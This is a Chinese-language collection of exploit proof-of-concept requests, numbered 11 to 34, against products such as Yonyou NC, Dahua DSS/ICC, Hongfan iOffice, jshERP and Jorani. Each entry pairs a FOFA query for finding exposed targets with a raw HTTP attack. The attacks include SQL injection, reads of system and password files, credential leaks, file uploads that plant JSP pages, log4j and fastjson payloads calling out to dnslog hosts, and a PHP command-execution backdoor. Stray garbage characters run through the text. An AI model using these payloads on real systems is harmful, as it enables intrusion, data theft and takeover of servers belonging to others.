% G3 G w& r# V/ Y$ _4 ]( V8 P1 m& s+ J+ I# _4 Z9 n, m- U6 z _
3 M' K7 T/ u* } Y X2 J
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入, n/ [4 P4 \, E
FOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"
& Y, x/ a( f* C# BGET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.18 z) h+ g! w% a; e Q
Host: 127.0.0.1& H y% G1 I* { p/ J
Pragma: no-cache
* l4 ]# } B( B" m- C% m% UCache-Control: no-cache& a" R! V1 [- S: D
Upgrade-Insecure-Requests: 1
7 A, _6 s: H) Q$ j6 }User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36) [2 R* s3 H0 d' A, q) f$ V4 m" q
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
/ h6 ?% i7 g- V5 mAccept-Encoding: gzip, deflate3 @' p& h) D( c- a7 a" ]) g
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
' y; l+ i: M N5 O! M; n6 b5 dConnection: close) P* p6 A3 z; A, H1 O( P
) N0 i4 H6 G. J1 C+ L' _2 k
1 F4 l4 l* g+ `$ P
12. Jorani < 1.0.2 远程命令执行
) ~" C' R5 V3 d3 D( x. T+ j; e% PFOFA:title="Jorani"1 {+ I% ^' j7 c& E
第一步先拿到cookie
$ e1 l% G: m# c2 {6 fGET /session/login HTTP/1.1
) Y: \& s+ S B* r8 z7 ZHost: 192.168.190.30
, G! ]- W3 v& j% S, PUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.367 P$ Q) |) a) a$ e1 A# l8 P) H5 V
Connection: close
* x1 o m2 h" H/ b8 |+ Y0 |( F0 CAccept-Encoding: gzip' k$ B+ T5 n; z$ Z9 Y6 M ?
# O& [- A! C7 Y/ j. \# {( |! R
( j% L A& }; P2 h7 ~8 v响应中csrf_cookie_jorani用于后续请求# x9 M, X5 x q: G7 g
HTTP/1.1 200 OK1 n V* w+ s1 I- V) D
Connection: close
/ J0 {5 h) t# w5 H1 hCache-Control: no-store, no-cache, must-revalidate
( {# P" n" E! Y2 F( }: W4 E% @# p: `Content-Type: text/html; charset=UTF-84 F/ y/ W! w/ d8 G
Date: Tue, 24 Oct 2023 09:34:28 GMT
/ o ~8 X8 h; I$ G. JExpires: Thu, 19 Nov 1981 08:52:00 GMT' x1 x! R0 j$ p5 a" Y- c# l, c
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT0 V+ |4 `' k$ K2 Q! y( @) H8 J
Pragma: no-cache
$ p! U! d6 ~0 a" f# @* z) S2 _5 KServer: Apache/2.4.54 (Debian)
]& C5 G) E: c/ b& USet-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
: D8 D4 N. ]1 ]( A# YSet-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly& Q4 x8 W! y. B$ a5 a j! W
Vary: Accept-Encoding
, M- V, ]8 F: Y, x3 O X& b$ B4 S) _% k- G0 I2 a' O2 u, C
) b' u+ g n. X& D' m3 e) CPOST请求,执行函数并进行base64编码8 z# A; L6 i G0 u J% [3 h2 L
POST /session/login HTTP/1.1
: r# p# `5 d: U- @. L; ]Host: 192.168.190.30
1 w) I: y9 h+ A7 nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
: V/ _4 \$ p; x6 s3 qConnection: close) I9 w: d3 B: ? S
Content-Length: 252, ]* ]. W1 W$ L% H5 r, z8 h/ h* g" S
Content-Type: application/x-www-form-urlencoded/ f. Z/ y% d7 ]% t
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
! l* u$ Q, P" ^' Q9 S% IAccept-Encoding: gzip! y; A! W& [! _
1 s5 d' {+ T2 e+ mcsrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor1 a/ q, w' V' P2 ]8 w
8 J" q4 H) |9 C3 t3 ~+ t
* n! ~/ b6 m& b: S: T
5 g V+ U7 J# l
向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串( S- c& H; r ~- ]
GET /pages/view/log-2023-10-24 HTTP/1.1
D& \/ A! K: }& sHost: 192.168.190.30
0 \! J$ ~4 d' {! VUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
4 ?' e, v" \: ], y; z( D* WConnection: close# j0 D, C4 P4 @ r& E# n
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
3 y$ k# L/ \/ P p. Y. ]& r3 [K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=+ O7 W. Z1 U4 m7 E
X-REQUESTED-WITH: XMLHttpRequest+ W! w( D/ \4 N! n# ?& b
Accept-Encoding: gzip
- T- Y/ D1 ], ?' y- I
) W5 D: a9 Z2 v$ [. u6 Q$ @/ F- C; _& \% A# o: m
13. 红帆iOffice ioFileDown任意文件读取
7 {, W! o6 F0 a; qFOFA:app="红帆-ioffice"
. n% [7 [% K) C+ |3 ]9 \6 [3 ^6 cGET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1; s7 g" i2 w1 H& D, O& I8 \
Host: x.x.x.x6 ^. z1 I/ g' N: Y; b5 w2 `
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
- s3 ^1 p% ?" g# D% r7 E* vConnection: close
$ d+ ^- H9 W7 L& W/ m; C0 ?Accept: */*
+ Y, G9 T% `1 @9 D3 hAccept-Encoding: gzip
! l2 J3 @& Z) U9 k z% H7 ~" _/ z2 B: y" d% _
- p! z- | o1 J8 W14. 华夏ERP(jshERP)敏感信息泄露3 g, w7 U) g, n+ s) S5 w. J
FOFA:body="jshERP-boot"
4 v# N) g: Q! i6 C泄露内容包括用户名密码) d- U- N: h0 ^5 g8 \+ f* [( t
GET /jshERP-boot/user/getAllList;.ico HTTP/1.15 m! Q, F _+ X/ ^6 _# Y
Host: x.x.x.x0 E" Q6 ^+ L9 g
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
, [1 F* \7 x+ Q7 F+ J* C1 p; C& _Connection: close: P( i7 S, a$ ]! R' r; o! W4 P |
Accept: */*
3 ]- ?9 k& M/ ~, R% D2 e, ?1 mAccept-Language: en
! |6 y5 v/ D' \, ^' |7 z" R# PAccept-Encoding: gzip6 `6 R# A- ?9 I5 O& s# B" }' ~
4 D5 Z& ~! m& k; } ^1 v7 G6 T) i' r/ i+ \0 }+ L
15. 华夏ERP getAllList信息泄露
! u {- [! U/ l# x, F: k2 H$ UCVE-2024-0490
# t2 F0 R' x3 a ~8 `' M+ gFOFA:body="jshERP-boot"
/ E; e8 b7 K3 b: o泄露内容包括用户名密码
' I9 h9 x. @' R% S8 QGET /jshERP-boot/user/a.ico/../getAllList HTTP/1.13 l; O2 I: y8 Y9 u! }7 B
Host: 192.168.40.130:100+ T7 w R" }5 A, A; x& g
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.368 U$ b6 v) j' n: T
Connection: close
7 B$ I9 P) [$ T- F2 dAccept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
$ c; _) P# z! ` t1 |* o% ]Accept-Language: en2 ?# b8 `2 \5 `3 w4 F8 x) S
sec-ch-ua-platform: Windows) J% z" O- S/ f5 [0 l1 G7 p
Accept-Encoding: gzip
6 { c4 c* [. J
2 \2 L! V6 ~% O" U( {1 O! W5 M7 K" } ^4 n$ Y" n; X# |
16. 红帆HFOffice医微云SQL注入! C% p' T( d6 ^% ?' J$ ?2 y0 e
FOFA:title="HFOffice"
d, Q+ d) o# N# J6 K, Npoc中调用函数计算1234的md5值9 E* S; Y- R' B/ h; O5 L" e+ P- U4 Y# e
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
O2 k5 U/ o5 T+ a. xHost: x.x.x.x
* O# J+ i/ u! S, f$ HUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
3 T% g I* `. l9 D4 k* u. KConnection: close
6 p1 o' C# V' z; E' Q/ ]Accept: */*
) W; m: h$ h g6 UAccept-Language: en6 h5 D2 v, b! G. Z1 Z) `
Accept-Encoding: gzip
! F& e( G8 B( W
2 R/ q3 n4 N1 m7 ~. M* Y
0 Y+ c+ l K, A$ q: m17. 大华 DSS itcBulletin SQL 注入. r1 _% t/ X" v9 f( c0 Y& M7 K& I
FOFA:app="dahua-DSS"4 D+ o- p9 ]: h+ j5 V1 o
POST /portal/services/itcBulletin?wsdl HTTP/1.1
( e8 \2 m2 c" y: J3 SHost: x.x.x.x
5 r' @4 u" T% x( eUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
7 k+ q* P, K$ `1 YConnection: close8 o0 z0 e a8 k, o/ c
Content-Length: 345) n9 G" v4 B: _# O+ H& P* z
Accept-Encoding: gzip6 H3 B* X% j0 _3 n2 N$ c& n% N
0 g. v5 t l9 |; Y' ?<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
% q* y% x3 k* H% B4 D$ [! h9 {<s11:Body>6 c8 X; R4 ~! f, n
<ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>7 P" G: C! [# r3 P* r" V% `
<netMarkings>& s7 I: j) I# {- \$ W0 v1 L V
(updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
; o. j$ g2 v7 g) l# p </netMarkings>" N7 P( \4 {; ~0 k$ _7 _
</ns1:deleteBulletin>
4 L0 b c# a9 w* i8 U2 t0 t! ` </s11:Body>
* b8 ~/ o: M+ `$ S3 T* a</s11:Envelope>
9 M( v5 q0 G7 C" `# B
, w6 M4 J( y' z( y3 @9 f: i4 W9 a7 n; X; A
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
$ i( C: q6 Q1 X" e' e+ xFOFA:app="dahua-DSS"
4 Q0 y! Z3 ]; Y% a) dGET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
* g1 Y+ X& p7 E$ ^- G, JHost: your-ip
+ B7 _ B _& ?. _$ K6 U/ VUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36% Q) ]1 D q6 ]. Z) @+ H8 o% M6 c
Accept-Encoding: gzip, deflate
! F3 X& v1 N& ^. {# `$ C8 lAccept: */*
! k& R& Z9 M& A: v2 mConnection: keep-alive' L2 [8 o' o4 Y" _+ L: J# N
8 L3 }, X0 n( ^, @% q6 L& k
) y7 Y3 ]. J: p) C/ Q3 O3 [! m$ U- q: t: a5 Y0 Z
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
* O. D. H) }4 c7 Z% JFOFA:app="dahua-DSS"/ w& u. F' O y3 f
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
* U3 ]5 c& S; A7 J8 kHost:
' i* |) \. i L( V. h+ Z% EUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36/ `% r& @& f1 D: m
Accept-Encoding: gzip, deflate
1 o7 E9 S2 v u4 CAccept: */*' U. l5 B |9 P
Connection: keep-alive4 K; P) {% B. r& X' ]! S% `. |
) s$ L2 }* L! s/ t+ ?4 C/ k# {
& B) S! |# f ~- @5 U, b20. 大华ICC智能物联综合管理平台任意文件读取- ^7 H, V" x6 g; l: w6 z
FOFA:body="*客户端会小于800*"
b) H9 X6 `6 g* E, B, ]GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
3 D9 {# q' v) e! nHost: x.x.x.x
) [( W4 q: z5 c) b9 z0 e8 rUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36; C2 L$ P5 z2 D: b
Connection: close; B! u1 a$ ]2 p0 w( n9 T
Accept: */*
' R7 x; @# ?, ] V$ U# G& KAccept-Language: en( F, ?7 o. @" k) T/ R2 S/ S
Accept-Encoding: gzip. i( c* {7 X Z& z
+ O0 a* C* D" k8 W+ Z- |4 b
) l6 Q7 Y, @/ o: @21. 大华ICC智能物联综合管理平台random远程代码执行
9 W+ ~8 _" v( N' vFOFA:icon_hash="-1935899595"9 Y% N( w, J" w$ t; M0 G
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.15 v/ N6 z' W1 `! {3 Q7 N: }
Host: x.x.x.x' u3 Q! A2 u* W* {% R
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
0 Y3 u5 q) i) ~) {9 _- r4 OContent-Length: 161: \* G! X" b, @* l
Accept-Encoding: gzip
6 d# {5 m8 z9 j5 T/ ]Connection: close
3 R$ z9 K: T' V: tContent-Type: application/json;charset=utf-8( C3 z8 E; U; E! B9 k
8 A4 I" {( N) H; \7 g. P4 Y, d, G{
+ r; a# [6 Z- _! q: L! t2 T"a":{1 P0 ~$ H( R: D5 e0 V
"@type":"com.alibaba.fastjson.JSONObject",
0 `% ?" g$ m" ^+ } {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}5 s+ y) ]) P" b0 N5 W$ }8 A% ? Z
}""5 b% W# m3 t4 \; M" F" q
}: b: {' t" w4 N6 U+ x" U- r
7 V5 X7 Y, L9 O K0 i& @& d# U+ i L. I s* d3 L7 w( y5 [
22. 大华ICC智能物联综合管理平台 log4j远程代码执行
" }) j& @1 B0 j# V3 b" pFOFA:icon_hash="-1935899595"( s0 F; E9 k; c6 X7 q8 Y6 w
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
' l" r2 C* W" Z% z4 V% ^$ ~1 yHost: your-ip
( E% W; ` f8 u s3 iUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
5 `' r% B7 D. R- ?Content-Type: application/json;charset=utf-86 U% l( t: Z& o/ h# C2 Y
" o8 i+ A; }. l7 b: U4 T- @
{
2 R# x1 S% J/ r* J: S. T"loginName":"${jndi:ldap://dnslog}"
* F5 e J% R2 k$ y0 \6 |/ R}1 J" ]/ r: n* a. P+ ~
! W* F1 _* w. N$ M
: c& M! |; {( Q2 V, b7 }- |
1 A3 E5 W3 W- u6 g& _
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行! }9 K# V% m* D/ ]/ s
FOFA:icon_hash="-1935899595"
3 \) |6 r; h0 h, \2 x. i [POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
' N& z* W2 f/ x4 A K$ a: k6 o" E: XHost: your-ip, X8 M( l' L! B ?2 q; _
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
7 K6 s0 h9 y2 q: ?- UContent-Type: application/json;charset=utf-8
$ Z+ D7 |( D# V, t- m' V# l6 kAccept-Encoding: gzip
! @6 a3 S+ Y R9 b* n: ?0 ZConnection: close \' j1 r- _- h. L1 S1 M
* U! q. k4 g9 \" F2 D{! j& d7 O' F+ @" T: o
"a":{
5 N' z- m+ P2 j( z2 G6 G7 h1 z "@type":"com.alibaba.fastjson.JSONObject",
0 r! q2 m# v; Q8 j8 ?0 N {"@type":"java.net.URL","val":"http://DNSLOG"}
% w3 L* B) M$ U }"". [% l) F) ^( ?! v9 R
}: ~! O9 @: U) h' P- V2 z r
' M: Z) U: o) J* K0 q6 S) g
" _* u% K! [' U0 Z3 ~" S9 l24. 用友NC 6.5 accept.jsp任意文件上传9 F: f) n; w& `$ [1 B( x
FOFA:icon_hash="1085941792"- z- N& [; t1 h; U& N* I
POST /aim/equipmap/accept.jsp HTTP/1.1
+ w% v' x& Y) u* e( cHost: x.x.x.x; P! H U$ j+ ]9 ]9 u
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
! V6 C( i# a0 P# {" I, q$ Y& E% nConnection: close( i' y/ U3 s( K5 N( V: ]
Content-Length: 449
7 T5 C! x, v$ \2 J: U1 }0 u- x" OAccept: */*
2 K0 K8 {" t" ?0 P9 x# |: Z% ?Accept-Encoding: gzip# ?/ Z& K' X9 P$ u1 t
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
, H3 o/ Z1 y6 c; T, R6 N* e5 O" w) m" [) o# p3 p# I" ]2 G
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc# q$ D- ?" Z: l! h M
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
# C& q/ o0 C- D! p; JContent-Type: text/plain/ [# O) Q ]# R' F, F3 Y
' ?$ n3 Q+ f6 s4 \! l/ }6 {0 p. d
<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>& S8 J5 q) q9 X7 I1 ]& a& ]
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc* e' H3 L0 A1 C$ w3 t9 Q9 X
Content-Disposition: form-data; name="fname"" L0 G! [& B, Z
' l( [4 x* ]3 L: w# X9 j" y
\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
% y6 K0 o! s8 i8 s$ H-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--
6 c8 a+ @* a$ Y5 O
& }/ e: M- L$ ~2 ?. Z
: |# U/ d7 S# J25. 用友NC registerServlet JNDI 远程代码执行0 L* H4 ]/ h1 a8 S( \& ?
FOFA:app="用友-UFIDA-NC"
# t' v; i$ w3 }POST /portal/registerServlet HTTP/1.1
0 m. n2 _; q9 E( O o9 r1 wHost: your-ip. H4 Z+ z9 ]9 a* c; l
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.02 S9 T- E5 k, O$ r* |: @7 G3 {
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.95 p# q$ x3 M) o% `( C
Accept-Encoding: gzip, deflate9 X% P k/ x# q: P- p& b. u
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6, K. e! h& r3 A$ ^1 x D$ P
Content-Type: application/x-www-form-urlencoded
7 g8 [) w6 C" F- |2 F$ R: t( C$ `
( e9 F0 B2 y* G3 v, ltype=1&dsname=ldap://dnslog% q3 ^3 v, W' \7 K6 O+ T- m
2 d" b1 i- D% d# E& s; i, O( u, l7 M' {% n
7 x5 O# Q0 |* b0 U& y1 x: J5 z/ |26. 用友NC linkVoucher SQL注入3 d! C7 M& V# O$ ?) f$ \
FOFA:app="用友-UFIDA-NC"" e- `# G# E( |2 N1 w- z
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
& E4 O! g! Q7 O6 K2 ~0 z. ]Host: your-ip7 Y) \' D2 @1 X, `7 f. Z' D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
9 K7 U0 Q9 _; b p+ JContent-Type: application/x-www-form-urlencoded9 @1 c! R4 I, p9 `7 h9 ^& Y
Accept-Encoding: gzip, deflate
( Y) a6 L$ w; fAccept: */*% @7 Z; X) e7 f/ h
Connection: keep-alive
& V/ h* z- a( F: u9 f- i! p' |) T* y; \1 I& N, q
P- `, x+ v8 x. y' Z/ A' N27. 用友 NC showcontent SQL注入
/ l+ N5 L2 t# F& h1 R4 r9 sFOFA:icon_hash="1085941792"
4 A" D( N7 N" k J! M g1 f/ O" YGET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
+ j# d$ S% |! Z4 {- Q sHost: your-ip
m9 z! m' i# F5 b( ZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
% D0 S4 ?( W6 P' UAccept-Encoding: identity) j* G8 |. m5 C. N
Connection: close- g U( o. Z) N+ r4 {9 D) K
Content-Type: text/xml; charset=utf-8
9 X5 z2 \7 C$ [8 r+ s6 L( R% M2 C. l' @
# g D j; Q" l
28. 用友NC grouptemplet 任意文件上传- J2 x3 M' q, x# ~% F& K
FOFA:icon_hash="1085941792"
% j2 a3 p! k% k- n ^& ^3 BPOST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1- e, p8 N- b+ U; @% Z! ^: Q
Host: x.x.x.x8 b. u3 k$ V' ^+ r1 d0 {8 c
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.369 A6 @$ @% ~ I1 U4 G
Connection: close" h5 D: ~* z0 @, ^8 _
Content-Length: 268& o- ?: y& f9 y' p' p' Q" h' |! X
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk( W+ ?5 l+ v' ]' \2 a
Accept-Encoding: gzip) q4 G, z) L0 U7 H P& A+ E
9 i& |2 M. L) X) p0 ^4 a- D
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk4 D9 t; ?" M7 T& q% e
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"- i+ [$ i8 Q4 h, H3 m, G
Content-Type: application/octet-stream
G9 _9 D" K: H! _$ D# a+ b
, d# v0 p* E1 I# ]! n2 b! v<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%> |/ @) l7 `; n
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--
1 S& z1 U, ^4 N, f R% J: Q R- T
9 _; f0 I% v5 [$ t
! r1 I3 ^% ?" m& P: f, V7 U/uapim/static/pages/nc/head.jsp( [" h" C x& Q2 x5 t( j. ~
. f! @/ }$ H& H) {: w. j8 v) p
29. 用友NC down/bill SQL注入
& _/ E; `4 ?3 u2 I4 j) xFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
4 D" f7 K; E2 y2 HGET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1" z+ v5 q( |8 ]; B
Host: your-ip
7 f h. C; N% t/ O# CUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.362 J8 t& k2 X; D0 a0 e$ {' G! y8 y9 ?: m
Content-Type: application/x-www-form-urlencoded1 C: C0 V! C0 @5 v* f' `+ q* j
Accept-Encoding: gzip, deflate/ F8 U7 i, u8 g4 G1 Y2 G
Accept: */*, w8 N K) I2 W3 h. w
Connection: keep-alive
) w2 a |7 t% B$ f. r/ U
8 c, p! ~8 j$ o6 p& J D+ A5 g3 t- X+ [ i( u
30. 用友NC importPml SQL注入; }; j' q6 d o0 \
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"2 {! G) ^& t. s" r! L( q) z# R- t
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
; g M) y6 u0 T8 ?8 Y iHost: your-ip
0 Z0 I2 r$ m1 h. @* P0 @Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
* U+ L" W: y5 C) z9 Z4 rUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36* O8 f4 o% U& \0 D0 T+ N
Connection: close- P0 N# D" y1 I- W! p- t; S, R
" W1 r& m6 [# G+ d
------WebKitFormBoundaryH970hbttBhoCyj9V* t; {) Q' B1 L3 j3 k! P
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
+ b: Q2 g" c3 ]3 q- @7 G) e, u. T+ |Content-Type: image/jpeg
& z( Y! H5 E' i- x& p" i+ N0 J3 ~* o( S------WebKitFormBoundaryH970hbttBhoCyj9V--
" }3 E4 `* v2 F* v8 R2 m' P$ q8 O5 b1 l
" h% b( i- t) u
31. 用友NC runStateServlet SQL注入
- D% k! H1 {* r. o! i; n! f+ ~( Hversion<=6.51 \0 B$ A8 A# V( S3 t9 H
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"! m& u( h# a/ P
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
- }% ~' ? j, U% |4 HHost: host/ L9 i/ B1 }4 Q# g
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
! G+ o1 M/ s7 N) {! X) lContent-Type: application/x-www-form-urlencoded
: k) Z% ]- R2 O o; R8 g& _1 e4 m' G9 y. _
4 N$ w, `! c& z: C7 [! b) Q32. 用友NC complainbilldetail SQL注入
$ y1 f& q2 j5 W) ^5 ^8 i, ?version= NC633、NC65" q$ M$ W9 x! Z6 Q
FOFA:app="用友-UFIDA-NC"# D. I& [* S: d- m Y0 j
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1: k" [8 n, ~! `) u! j
Host: your-ip0 R- R5 j* ^% i3 K) `/ P
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" P |( {- h# H1 Q# Y
Content-Type: application/x-www-form-urlencoded! H' u- u% r: A; T
Accept-Encoding: gzip, deflate
+ j' Q( b9 v/ G$ gAccept: */*
1 F" ^/ @- b' Z# `1 \- ~. rConnection: keep-alive2 s. x& H [5 y
5 Q7 @5 z* x, X2 r7 b/ {/ O/ c
* H; R" f5 {$ A% Z( c33. 用友NC downTax/download SQL注入
, k7 i4 \' _: H% K! x8 ?$ ~ oversion:NC6.5FOFA:app="用友-UFIDA-NC"6 k3 G; a; b* ~( u( N6 Y# L& v1 z
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1# ]- h$ g; J& F. u4 K
Host: your-ip8 f8 h/ S; \$ g c
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36. N W1 |% e5 H6 E+ [/ M
Content-Type: application/x-www-form-urlencoded% w T3 r& O. |( F+ `
Accept-Encoding: gzip, deflate: m6 T) p9 Y$ ?$ ]8 m$ i
Accept: */*) c) G( t7 \9 k# p- I8 n1 C
Connection: keep-alive7 K6 x9 E6 x V- p9 S7 m$ Z* g
, T; L0 n" t0 d' M% V
( I8 a$ i- @) `34. 用友NC warningDetailInfo接口SQL注入
3 L1 v3 V: a; {. L; GFOFA:app="用友-UFIDA-NC"4 b# ^' ?( ^/ R$ R
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1+ x% x! K, @3 n6 l* i5 t* M
Host: your-ip
8 q( q0 y) @3 z/ w. YUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.366 E. b. c4 E d& Q* P
